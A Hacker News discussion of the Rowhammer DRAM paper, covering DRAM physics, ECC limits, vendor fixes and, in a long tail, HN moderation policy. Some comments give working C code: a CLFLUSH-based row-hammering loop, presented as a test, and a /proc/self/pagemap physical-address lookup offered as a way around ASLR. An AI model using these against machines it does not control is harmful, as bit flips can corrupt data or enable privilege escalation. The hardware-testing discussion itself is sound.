
Flipping bits in memory without accessing them [pdf] - ColinWright
https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf
======
kabdib
What goes on at the chip level is terrifying. "You have to understand," a
hardware engineer once said to me, when we shipped a consumer computer that
was clocking its memory system 15% faster than the chips were supposed to go,
"that DRAMs are essentially analog devices." He was pushing them to the limit,
but he knew what it was, and we never had a problem with the memory system.

There was a great TR from IBM describing memory system design for one of their
PowerPC chips. Summary: Do your board layout, follow all these rules [a big
list], then plan to spend six months in a lab twiddling transmission line
parameters and re-doing layout until you're sure it works . . .

~~~
hga
True horror story: The first board I was involved with when working at Lucent
in 2001 was a monster modem card that provided something like 300 modems, plus
or minus. For a long time in the development process we had a weird
reliability problem that just could not be tracked down. Until, in
desperation, a hardware engineer started putting his scope probe _everywhere_
... and found a line (or set of them) where the signal was messed up in the
middle but not at the end!!!

Analog is a black art.

~~~
nitrogen
Black arts are just arts with more rules than we ourselves understand. I don't
think we should let that scare us from trying to understand. It's all just
physics.

~~~
kabdib
It's also about manufacturing tolerances, making room for error, surviving
environmental stuff, and understanding that the universe is out to get you.
Sure, taken ad absurdum it's all just physics, but most of shipping a product
is making engineering tradeoffs, dealing with complex stuff you may not fully
understand, and making plans for when vendor B's chips aren't exactly the same
as vendor A's, but vendor A was just bought by Apple and won't talk to you any
more, at any price. :-)

------
hammer_test
Note: the regular memtest86+ doesn't have this test. Use the researchers'
fork:

[https://github.com/CMU-SAFARI/rowhammer](https://github.com/CMU-SAFARI/rowhammer)

On Ubuntu 14.04, run this to pull in all the dependencies for building: sudo
apt-get build-dep memtest86+

Update: just finished running the test on my cheap Lenovo laptop. Not
affected. phew! :)

~~~
Tobu
It's been upstreamed, hasn't it?

Announcement
[http://www.passmark.com/forum/showthread.php?4836-MemTest86-...](http://www.passmark.com/forum/showthread.php?4836-MemTest86-v6-0-Beta)

Previous discussion
[https://news.ycombinator.com/item?id=8713411](https://news.ycombinator.com/item?id=8713411)

------
zanethomas
The success of this approach to corrupting memory depends upon knowing the
geometry of the memory chip. Naive calculations of which addresses correspond
to an adjacent row may be incorrect.

It's interesting to see this issue addressed in 2015. In 1980 I worked at
Alpha Microsystems and designed a memory chip test program which used
translation tables based upon information we required chip manufacturers to
give us in order for their chips to be used in the systems we sold.

That approach required us to put only one type of memory chip on a memory
board. But back in the day microsystems were expensive and customers expected
them to be well-tested.

~~~
hga
My family thanks you and your colleagues.

Back in mid-1979, just before I went to college, I looked at the then-current
alternatives and picked Alpha Micro as the company to go with for a system to
computerize a bunch of doctors' offices. It worked very well, as did another
one a few years later that helped systematize a company providing satellite TV
gear.

------
jhowe
I work in the chip industry. This was a good paper.

1\. Note that chip-kill/Extended ECC/Advanced ECC/Chipspare, which are all
similar server-vendor methods for 4-bit correction, will prevent this problem.
These methods are enabled on the higher-reliability server systems.

2\. This failure mode has been known to the DRAM industry for a couple of
years now, and the newest DRAM parts being produced have this problem solved.
The exact solution varies by DRAM vendor. I wish I could go into specifics,
but I am unaware of any vendor that has publicly stated its fix.

~~~
userbinator
_the newest DRAM parts being produced have this problem solved_

How new exactly? The newest tested in the paper is from July 2014 and that
still has the problem.

~~~
rab_oof
You're more than right. In fact, the paper explicitly mentions that
4-bit-correct/5-bit-detect ECC (detect but fail to correct) doesn't solve the
issue, because each victim row on either side of the aggressor row accumulates
varying numbers of multi-bit (5+) errors.

It doesn't fix systems deployed right now, and could be used for attacking
hypervisors and other multi-tenant systems. It might also make for an
interesting class of local privilege escalation attacks to try
probabilistically on otherwise correctly secured systems.

------
BetaCygni
Excellent article! The fact that they can reliably produce errors in most RAM
modules is worrying. They also propose a solution (probabilistic refresh of
neighboring rows).
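
Their mitigation is simple enough to sketch. What follows is a hedged
illustration of the idea rather than the paper's exact algorithm;
refresh_row() stands in for a hypothetical memory-controller primitive and
the probability is just an example value:

    #include <stdlib.h>

    void refresh_row(unsigned bank, unsigned row);  /* hypothetical controller op */

    /* On every row activation, also refresh the row's physical neighbors
     * with small probability p. A row hammered N times then gets its
     * victims refreshed about N*p times in expectation, so for N in the
     * hundreds of thousands even p = 0.001 makes a missed refresh
     * astronomically unlikely. */
    void on_activate(unsigned bank, unsigned row, unsigned rows_per_bank)
    {
        const double p = 0.001;
        if ((double)rand() / RAND_MAX < p) {
            if (row > 0)
                refresh_row(bank, row - 1);
            if (row + 1 < rows_per_bank)
                refresh_row(bank, row + 1);
        }
    }

The appeal is that it's stateless: no per-row counters, just a cheap coin
flip on each activation.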

~~~
userbinator
The scary thing is that such a "solution" could be silently disabled, with
effectively no signs of any problem (and in fact it would probably increase
performance a little!) - I mentioned this in the previous discussion here:
[https://news.ycombinator.com/item?id=8716977](https://news.ycombinator.com/item?id=8716977)

I know there are other parameters of the memory controller that could be
changed to cause corruption, e.g. reducing the refresh rate or tweaking the
timings, but that is likely to yield random corruptions in normal use instead
of this precise one.

To me, the real solution seems to be to stop making DRAM on such high-density
processes until design changes can be made that restore the old reliability,
because at some point it stops behaving like real memory and turns into a
crude approximation of it; memory should reliably store the data it holds,
without corruption, regardless of access pattern.

------
bhouston
How long until someone uses this as the basis of an exploit? Maybe not root
access, but if you can figure out an OS call that replicates the access
pattern, you can corrupt machines just by interacting with them.

~~~
ajross
There's no need for an OS call. Plain userspace access to the same mapped
memory will stay in the same physical page for far, far longer than a few
hundred thousand DRAM cycles. Obviously the hard part of an exploit would be
locating those corrupted bits elsewhere in the system. That's going to depend
entirely on the hardware layout of the DRAM chip.

~~~
witty_username
And I guess ASLR would make it even harder.

~~~
johnsmith108959
ASLR only affects the virtual address space. The physical memory allocations
are all probably unaffected by ASLR.
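
For what it's worth, on Linux an unprivileged process could even observe its
own virtual-to-physical mappings through /proc/self/pagemap (one 64-bit entry
per virtual page: bit 63 = present, bits 0-54 = physical frame number), which
makes ASLR irrelevant to this attack. A minimal sketch, assuming 64-bit
Linux; note that kernels may later restrict unprivileged access to the PFN
field:

    #include <stdint.h>
    #include <stdio.h>
    #include <unistd.h>

    /* Look up the physical frame number backing a virtual address via
     * /proc/self/pagemap. Returns 0 on any failure or if not present. */
    uint64_t virt_to_pfn(const void *vaddr)
    {
        long page = sysconf(_SC_PAGESIZE);
        uint64_t entry = 0;
        FILE *f = fopen("/proc/self/pagemap", "rb");
        if (f == NULL)
            return 0;
        if (fseek(f, (long)((uintptr_t)vaddr / page * 8), SEEK_SET) == 0)
            fread(&entry, sizeof entry, 1, f);
        fclose(f);
        if (!(entry & (1ULL << 63)))   /* page not present in RAM */
            return 0;
        return entry & ((1ULL << 55) - 1);
    }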

------
markbnj
This article actually contains one of the better-written fundamental
explanations of DRAM operation that I've read. Thanks for the post.

------
mseaborn
Here is a program for testing for the DRAM rowhammer problem which runs as a
normal userland process:
[https://github.com/mseaborn/rowhammer-test](https://github.com/mseaborn/rowhammer-test)

Note that for the test to do row hammering effectively, it must pick two
addresses that are in different rows but in the same bank. A good way of doing
that is just to pick random pairs of addresses. If your machine has 16 banks
of DRAM, for example (as various machines I've tested do), there should be a
1/16 chance that the two addresses are in the same bank. This is what the test
above does. (Actually, it picks >2 addresses to hammer per iteration.)

Be careful about running the test, because on machines that are susceptible to
rowhammer, it could cause bit flips that crash the machine (or worse, bit
flips in data that gets written back to disc).
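
For readers who want the shape of the inner loop, here is a minimal sketch of
the approach described above. It is not the rowhammer-test code itself; it
assumes an x86 machine with SSE2 (for the unprivileged CLFLUSH intrinsic),
and the constants are illustrative:

    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <emmintrin.h>   /* _mm_clflush */

    /* Alternately read two addresses, flushing them from the cache each
     * time so every read goes to DRAM. If the pair lands in different
     * rows of the same bank, those two rows get activated over and over. */
    static void hammer_pair(volatile uint32_t *a, volatile uint32_t *b, long n)
    {
        while (n-- > 0) {
            (void)*a;                      /* read -> row activation */
            (void)*b;
            _mm_clflush((const void *)a);  /* force the next read to miss */
            _mm_clflush((const void *)b);
        }
    }

    int main(void)
    {
        size_t size = 1u << 30;            /* large buffer, many banks */
        uint8_t *buf = malloc(size);
        if (buf == NULL)
            return 1;
        memset(buf, 0xff, size);           /* fault pages in; all bits set */
        for (int trial = 0; trial < 100; trial++) {
            volatile uint32_t *a = (volatile uint32_t *)
                (buf + ((size_t)rand() % (size / 64)) * 64);
            volatile uint32_t *b = (volatile uint32_t *)
                (buf + ((size_t)rand() % (size / 64)) * 64);
            hammer_pair(a, b, 500000);     /* well past the reported minimum */
        }
        /* ...then scan buf for any byte that is no longer 0xff... */
        free(buf);
        return 0;
    }

With 16 banks, roughly 1 trial in 16 picks a same-bank pair, which is why
hammering many random pairs works without knowing the address-to-bank
mapping.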

------
blinkingled
Hopefully this doesn't affect ECC DRAM? Also, does the problem get worse with
increased density - i.e. are 16GB modules more vulnerable than, say, 8GB
ones?

~~~
twotwotwo
It helps, but they point out you can get two-bit errors that ECC can merely
detect (or, much more rarely, 3+-bit errors that ECC isn't guaranteed to even
detect). Mighty tricky to work out an exploit that flips just the right two
security-relevant bits, though.
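
To make those failure classes concrete, here is a hedged toy version: an
extended Hamming(8,4) code, the 4-data-bit cousin of the SECDED(72,64) codes
real ECC DIMMs use (an illustration of SECDED behavior in general, not any
DIMM's actual circuit):

    #include <stdint.h>
    #include <stdio.h>

    /* Toy SECDED: extended Hamming(8,4). Bit 0 is overall parity; bits
     * 1-7 hold the classic Hamming layout p1 p2 d1 p4 d2 d3 d4. */
    static uint8_t encode(uint8_t d)          /* d = 4 data bits */
    {
        uint8_t d1 = d & 1, d2 = d >> 1 & 1, d3 = d >> 2 & 1, d4 = d >> 3 & 1;
        uint8_t c = (uint8_t)((d1 ^ d2 ^ d4) << 1   /* p1 */
                            | (d1 ^ d3 ^ d4) << 2   /* p2 */
                            |  d1            << 3
                            | (d2 ^ d3 ^ d4) << 4   /* p4 */
                            |  d2 << 5 | d3 << 6 | d4 << 7);
        uint8_t all = c;
        all ^= all >> 4; all ^= all >> 2; all ^= all >> 1;
        return c | (all & 1);                 /* overall even parity */
    }

    /* 0 = clean, 1 = "single error, corrected", 2 = "double, detect only" */
    static int decode(uint8_t c)
    {
        uint8_t syndrome = 0, parity = 0;
        for (int i = 0; i < 8; i++)
            if (c >> i & 1) { parity ^= 1; syndrome ^= (uint8_t)i; }
        if (syndrome == 0 && parity == 0) return 0;
        if (parity == 1) return 1;            /* odd number of flips */
        return 2;                             /* even flips, bad syndrome */
    }

    int main(void)
    {
        uint8_t c = encode(0x9);
        printf("1 flip  -> class %d\n", decode(c ^ 0x08));  /* 1: fixed */
        printf("2 flips -> class %d\n", decode(c ^ 0x0c));  /* 2: detected */
        printf("3 flips -> class %d\n", decode(c ^ 0x1c));  /* 1: "fixed",
                                                               wrong bit! */
        return 0;
    }

The three-flip case is the scary one: the decoder confidently "corrects" the
wrong bit, which is the kind of silent corruption heavily hammered victim
rows can produce.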

------
diydsp
From the abstract:

High-speed repeated DRAM reads disturb nearby cells. Reproduced on 110 of 129
modules tested, on Intel and AMD systems, with as few as 139K reads; up to 1
in 1.7K cells affected.

------
phkahler
Problem: They propose a solution and calculate the reliability of the
solution. Why not test it with their FPGA based memory controller and
demonstrate an improvement?

Second: While the problem looks real enough, the tests used to demonstrate it
are not realistic. Hammering the same rows with consecutive reads does not
happen in the real world because of caches, which they get around via cache
flushes. I'd like to see more data on how bad the abuse needs to be to cause
the problem. Will 2 reads in a row cause errors? 5? 10? 100? They never
address how likely this is to be a real-world problem. I don't doubt that it
is, but how often?

~~~
xenadu02
They address all of these in the paper. It takes ~180,000 "hammered" reads to
trigger. The problem is that even the least-privileged code can do it,
because it's just reading without using the cache - a perfectly valid thing
that must be allowed for multi-threaded code to even work correctly.

Secondly, the DRAM makers don't currently provide enough information to
reliably know which neighbors to refresh. I suppose they could have used
their guesses to test on the FPGA rig, but given the rest of the paper I'm
reasonably satisfied that they have correctly identified the problem and that
their solution would work.

~~~
kabdib
Sometimes an exploit simply needs to make more trusted code take an exception
(often after "paving" memory with known values). Since an exception can
theoretically be induced by user-mode code flipping bits in structures it
doesn't own . . .

I can see "exploit resistant memory" being a selling point, maybe soon.

------
rebootthesystem
I've completed many multi-gigahertz product designs during my career. If you
take the time to study and understand the physics involved, and bother to do
a bit of math, none of it is particularly difficult. I reject the
characterization of this as some kind of black art. It's not magic. Yes, of
course, experience helps, but it isn't magic. One problem is that some in the
industry still use people who do layout based on how things look rather than
through a scientific process. Yes, it's analog electronics. When was it
anything else?

Want to wrap your head around another challenging aspect of high-speed
design? Power distribution system (PDS) design. You can design perfect boards
based on solid transmission-line and RF theory and still have them fail due
to issues such as frequency-dependent impedances and resonances in the PDS.

------
pera
So basically you just repeat a couple of memory reads a few hundred thousand
times and this alters some nearby cell? Why didn't manufacturers test for
this? It looks like a pretty obvious thing to test when working at these
scales.

~~~
mud_dauber
Because the applications that care the most about these types of errors
(big-iron networking and mil/aero) implement software error correction in the
processor. It's not worth spending the extra money in final test when
commodity DRAM is, well, a commodity.

~~~
johnsmith108959
Yes, ECC memory, although it's mostly implemented by the chipset and DRAM
modules, with only a small part of it being in the processor.

~~~
mud_dauber
Thanks for the clarification John.

------
kazinator
Interestingly, the researchers used a Xilinx FPGA, not just an off-the-shelf
AMD or Intel PC.

Why not?

If the attack can only be reproduced with custom hardware, why should anyone
care?

Also, precise patterns of access to DRAM would require disabling the L1 and L2
caches. Doesn't that sort of thing require privileged instructions?

With caching in place, memory accesses are indirect. You have to be able to
reproduce the attack using only patterns of cache line loads and spills.

~~~
kmowery
No, they reproduced on "Intel (Sandy Bridge, Ivy Bridge, and Haswell) and AMD
(Piledriver) systems using a 2GB DDR3 module." (see Section 4)

They evict cache lines using the CLFLUSH x86 instruction, which I believe is
unprivileged.

~~~
dllthomas
CLFLUSH is definitely unprivileged - I made use of it on a recent project
(evicting outbound messages from a core's cache cut cache misses
meaningfully).

------
jhallenworld
I think row hammer is basically a DRAM design defect, and I wish it were
fixed in the DRAM itself instead of on the controller side. At the very
least, the DRAM vendors should document this access-pattern limitation in
their datasheets.

------
rab_oof
Am I wrong (asking anyone who happens to work on processor microcode), or
could per-processor microcode patches insert a minimum delay where needed,
based on RAM parameters and organization, to prevent this?

------
tsukikage
So, busywaiting on spinlocks considered dangerous?

~~~
nitrogen
That would probably read from cache most of the time.
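
A minimal sketch of why, assuming a typical cache-coherent x86 machine
(illustrative, not from the paper):

    #include <stdatomic.h>

    /* A conventional spin-wait. After the first access, the flag's cache
     * line is resident in L1, so every subsequent load is served by the
     * cache and never reaches DRAM - no row activations, no hammering.
     * The line only produces memory traffic again when another core
     * writes the flag and coherence invalidates this core's copy. */
    void spin_until_set(atomic_int *flag)
    {
        while (atomic_load_explicit(flag, memory_order_acquire) == 0)
            ;  /* cache hit, not a DRAM access */
    }

Rowhammer needs the opposite pattern: reads forced to miss the cache every
time, e.g. via CLFLUSH, as in the paper.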

------
edwintorok
Why doesn't it mention the manufacturers' names?

~~~
mud_dauber
The work _may_ have been funded by the manufacturers in return for the
analysis and discretion.

There aren't that many DRAM manufacturers in the world. Micron, Samsung,
Elpida, and Hynix are all excellent bets.

------
jadc
Discussion from a couple of weeks ago:

[https://news.ycombinator.com/item?id=8713411](https://news.ycombinator.com/item?id=8713411)

~~~
ColinWright
Missed that - thanks - although to be fair there doesn't actually seem to be
that much discussion there. Maybe most people missed it.

Edit: Just checking: it was at position 120, looks like it got artificially
promoted to position 25, then sank quickly.

[http://hnrankings.info/8713411/](http://hnrankings.info/8713411/)

~~~
wdewind
> looks like it got artificially promoted to 25

How does that happen?

~~~
ColinWright
The mods have in place mechanisms to find submissions they think have slipped
through the net and provide a boost for them. It's experimental and
undocumented, but I saw it mentioned a while ago[0].

I think it's a good thing, even if it's somewhat arbitrary and has its share
of false positives and false negatives. I've always been a fan of stochastic
processes - they exhibit lots of good behavior and comparatively few
pathological flaws.

[0]
[https://news.ycombinator.com/item?id=8157698](https://news.ycombinator.com/item?id=8157698)

~~~
wdewind
Honestly, I'm bummed to see a lot of the recent aggressive moderation. I know
the community is far from perfect, but seeing arbitrary posts moved to the
front page, and existing front-page stories changing not only in title but
also in the article they link to after discussion has already happened, etc.,
all strike me as obviously worse than just letting the chaos of the community
sort itself out.

~~~
dang
I'm bummed that you're bummed. But we may not disagree as much as it seems, so
let me try clarifying.

Our plan is to turn as much moderation over to the community as possible;
getting there is going to require additional mechanisms. HN has one axiom:
it's a site for stories that gratify intellectual curiosity. All the rest is
details. The existing mechanisms—upvoting and /newest—are insufficient for the
community to sort out which stories are best by that standard. The trouble
with upvoting is that stories that gratify intellectual curiosity regularly
attract fewer upvotes than stories that are interesting for other reasons. The
trouble with /newest is that not enough users will sift through it to find the
best submissions. That's easy to understand: it's tedious. Wading through
hundreds of posts to find perhaps 3% that gratify intellectual curiosity does
not gratify intellectual curiosity! The very reason people come to HN is a
reason not to want to do that, and so we have a tragedy of the commons.

So if upvoting and /newest are suboptimal for HN, what should we do? In the
long run, the answer hopefully is to have a new system that lets the community
take care of it. But in the short run, before we know what the new system
should be, our answer is (a) to experiment, and (b) to do things manually
before trying to systematize anything.

Over the last several months, we've tried various things. For example, we
tried randomly placing a story from /newest on the front page. We didn't roll
that out to everybody, but we did for enough users to make it clear that it
wasn't going anywhere. The median randomly selected story is too poor in
quality for this to work.

Of our experiments, the one that has produced by far the best results (to
judge by receipt of upvotes, non-receipt of flags, and comments about the
article being good) is reviewing the story stream for high-quality submissions
and occasionally lobbing one or two of them onto the bottom of the front page.
That's the experiment ColinWright was referring to. The idea is, from the pool
of stories that would otherwise fall through the cracks, for humans to pick
candidates for second exposure. These get a randomized shot at the front page
long enough for the community to decide their fate. Most fall away quickly,
but some get taken up, and so the HN front page sees more high-quality
stories. It's important to realize that this is a supplement to the ordinary
mechanism of users upvoting stories from /newest. That works the same as
always.

This is not a permanent system—just an experiment to gain information—and one
lesson we've drawn from it is that moderators should not be doing all the
reviewing. We'd prefer it to be community-driven, and anyway there are too
many stories and too few of us to look at them all. At the same time, the
results have been so salutary that I feel obliged to continue doing it until
we can replace it with something better.

What system might we build so the community can do this work and we don't have
to? If upvoting and /newest can't do it, what could?

HN already has a mechanism for mitigating the problems with upvoting:
flagging. Where upvoting works worse than one would expect, flagging works
better. (We do have to compensate for bad flagging, but surprisingly little.)
But flagging only helps weed out inappropriate stories; it does nothing to
help the best stories surface. So one thought is that we need a mechanism
similar to flagging, but positive rather than negative.

As for /newest, if the problem is that there's no incentive to do it, we need
to make it rewarding. HN already has a reward mechanism: karma. Perhaps users
who put in the work of sifting through new stories could be rewarded in karma
[1].

Put these two thoughts together and the idea that emerges is of a story-
reviewing mechanism, similar to flagging but focused on identifying good
stories, where any user who puts in the effort and does a good job is rewarded
in karma for service to the community.

The challenge is in defining _a good job_. It can't be something you could
write a computer program to do—short of writing a program to identify all the
best stories, of course, in which case you deserve all the karma. If a story
eventually gets lots of upvotes (and few flags), that would be one way of
scoring a good review. But there need to be other ways, because there are many
more good stories than slots on the front page.

And with that you pretty much have a core dump of our current thinking on
story curation—subject to change as new ideas emerge.

1\. HN could use a new way of earning karma anyhow. A common criticism, which
I think has merit, is that the current system is a rich-get-richer affair
where most gains accrue to a clique of old-timers and there's little chance
for anyone new to catch up.

~~~
wdewind
Thanks for replying, dang, I appreciate it.

I'm on this site a fair amount and don't feel super informed about the ongoing
plans (was surprised to hear about the artificial movement of stories, for
instance). Any details you could provide there would be really helpful, and
I'm sure the community would appreciate knowing what's in store. Maybe even a
dedicated page for news about the hn platform/algo and experiments.

> The existing mechanisms—upvoting and /newest—are insufficient for the
> community to sort out which stories are best by that standard. The trouble
> with upvoting is that stories that gratify intellectual curiosity regularly
> attract fewer upvotes than stories that are interesting for other reasons.

I think this fact is indisputable, but the question is: which scales better?
Large communities with heavy moderation have frequently descended into
corruption quickly. Again, I think communicating your plans/experiments would
be really helpful (and also gratifying of intellectual curiosity!)

~~~
dang
I'm in the process of expanding on my comment above; "I'll add more in a bit"
means in a few minutes when I have time to write more. That's the only reason
I don't post more about this, by the way—it's time-consuming, and takes
already-limited time away from actually doing any of the things being written
about. So I mostly just reply to questions when people have them. Anyhow,
please check back in a little while and I'll try to explain more.

~~~
wdewind
That's cool, but with respect, it might be better to turn it into a brief
summary and repost it as a top-level item. This child thread is deep and
buried now, so few users are going to see it.

~~~
dang
That's a natural suggestion, but my experience is that it doesn't work so
well. If I make a top-level post out of this, it will lose the feeling of
"conversation with a user", become something official, and other factors will
kick in. There's a place for that, of course, but it's a different thing and
one mustn't overdo it. I will formally ask for feedback when we get closer to
knowing what we're asking about, but for now it's just thinking out loud.

Also, you'd be surprised at how much the information in discussions like this
makes its way into circulation. People do find this stuff, and I think it's
more fun to run across it this way.

------
blazespin
Sounds like a great technique for a DDoS.

